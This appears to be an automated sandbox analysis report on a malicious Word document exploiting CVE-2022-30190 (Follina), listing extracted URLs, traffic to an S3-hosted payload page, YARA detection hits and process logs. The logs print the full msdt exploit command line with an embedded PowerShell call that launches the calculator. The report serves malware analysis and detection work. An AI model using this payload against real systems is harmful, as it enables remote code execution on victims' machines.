          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.microsoftonline.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.windows.local
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://management.azure.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://management.azure.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://messaging.action.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://messaging.engagement.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://messaging.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://ncus.contentsync.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://ncus.pagecontentsync.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://officeapps.live.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://onedrive.live.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://osi.office.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://otelrules.azureedge.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://outlook.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://outlook.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://outlook.office365.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://outlook.office365.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://powerlift.acompli.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://roaming.edog.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://settings.outlook.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: ~WRS{1EB9DA41-0F80-48E3-B000-307AD8C63D0C}.tmp.0.drString found in binary or memory: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://staging.cortana.ai
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://tasks.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://webshell.suite.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://wus2.contentsync.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: unknownDNS traffic detected: queries for: sqdocs.s3.eu-west-2.amazonaws.com
          Source: global trafficHTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comIf-Modified-Since: Sat, 28 May 2022 14:15:08 GMTIf-None-Match: "bfbfa8fdda62476690c9077946372eaa"Connection: Keep-Alive
          Source: unknownHTTPS traffic detected: 52.95.148.198:443 -> 192.168.2.3:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.95.143.42:443 -> 192.168.2.3:49749 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
          Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
          Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
          Source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 0000000C.00000002.559095546.0000000000718000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 0000000C.00000002.558856728.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: Process Memory Space: msdt.exe PID: 5556, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: DiagPackage.dll.12.drStatic PE information: No import functions for PE file found
          Source: DiagPackage.dll.mui.12.drStatic PE information: No import functions for PE file found
          Source: DiagPackage.dll.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DiagPackage.dll.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DiagPackage.dll.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dll
          Source: icRTA4gcSe.docxVirustotal: Detection: 47%
          Source: icRTA4gcSe.docxMetadefender: Detection: 28%
          Source: icRTA4gcSe.docxReversingLabs: Detection: 61%
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP"
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP"
          Source: unknownProcess created: C:\Windows\SysWOW64\calc.exe "C:\Windows\system32\calc.exe"
          Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP"
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP"
          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
          Source: icRTA4gcSe.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\icRTA4gcSe.docx
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{993656D6-8265-43CF-8062-6407D43136B8} - OProcSessId.datJump to behavior
          Source: classification engineClassification label: mal92.expl.evad.winDOCX@16/30@2/2
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
